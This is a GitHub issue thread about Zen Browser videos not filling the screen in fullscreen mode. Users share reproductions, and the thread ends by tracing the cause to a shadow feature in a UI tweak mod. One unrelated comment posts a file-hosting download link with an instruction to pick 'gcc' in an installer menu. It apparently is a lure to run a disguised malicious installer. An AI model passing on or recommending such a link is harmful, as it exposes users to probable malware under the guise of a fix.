### ISSUE TITLE
Video players don't fullscreen when fullscreened.

### ISSUE THREAD

**Issue by monoastro** [zen-browser/desktop#660]
### What happened?

Behavior observed specifically on YouTube's and Reddit's videos when the extension "Disable Rounded Corners" is installed. The videos on these platforms when full-screened just occupy a little more than a quarter of my screen. This issue does not occur when the extension is not installed.

Extra settings that I have enabled are:
- ✓ Enable Zen Browser's compact mode
- ✓ Hide the top toolbar as well in compact mode

Attached below are what my screen looks like in normal mode and full-screen mode on YouTube.

![normal_view](https://github.com/user-attachments/assets/c4679627-5480-40be-94fa-ecb8a4a392ff)
![full_screen?](https://github.com/user-attachments/assets/8fb41caa-65dc-42f7-bbaa-b3c8668ac962)

 

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.28

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

### Relevant log output

```shell
>zen-browser --version
Mozilla Zen 1.0.0-a.28
```

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by bw8686** [comment]
I'm unable to replicate this issue could you provide some further details about the platform your running Zen Browser on.

**Comment by CamGreg** [comment]
Reproduced on Flatpak Firefox when in **full screen** mode. Does not occur on Windows in Zen or Firefox.

**Comment by meisaamayako** [comment]
I can confirm this also occurs on my system in Arch Linux when watching Youtube in fullscreen.

Operating System: Arch Linux 
KDE Plasma Version: 6.1.5
KDE Frameworks Version: 6.5.0
Qt Version: 6.7.2
Kernel Version: 6.10.10-1-cachyos-eevdf (64-bit)
Graphics Platform: Wayland
Processors: 12 × Intel® Core™ i7-9750H CPU @ 2.60GHz
Memory: 15.5 GiB of RAM
Graphics Processor: Mesa Intel® UHD Graphics 630
Manufacturer: Acer
Product Name: Predator PH315-52
System Version: V1.12

![17 Tue 092406954](https://github.com/user-attachments/assets/78e95636-5fda-4339-93cc-9fa75113fa22)

Issue is off to the side, I just searched a random linux video from a random channel to showcase the bug. On the lower right side.

**Comment by antikovt** [comment]
Can confirm the same issue as @meisaamayako on Windows. Seems to me like the fullscreen view doesn't overwrite the right and bottom paddings for whatever reason

![image](https://github.com/user-attachments/assets/303c2602-5bce-43c5-9873-e6a3ccf66f3f)

View the full screenshot for visibility, not visible in the preview

**Comment by antikovt** [comment]
Good bot. This bug is making me lose my mind 😆

**Comment by meisaamayako** [comment]
I should note (i forgot to mention it here) that this issue solved itself for me a few updates ago, _i am not sure if its a Zen Mod that I used_ that fixed that or whether the update itself fixed it though. Consider it **solved** for me, as of the latest alpha.

**Comment by antikovt** [comment]
> i am not sure if its a Zen Mod that I used

Welp, I just managed to pinpoint the issue to a single function of a single mode.

It's "Adds shadows to the page canvas" in "Erics Zen UI Tweak Box". Turning off the feature fixes the bug.

So sorry for the confusion, the issue can be closed now I suppose.
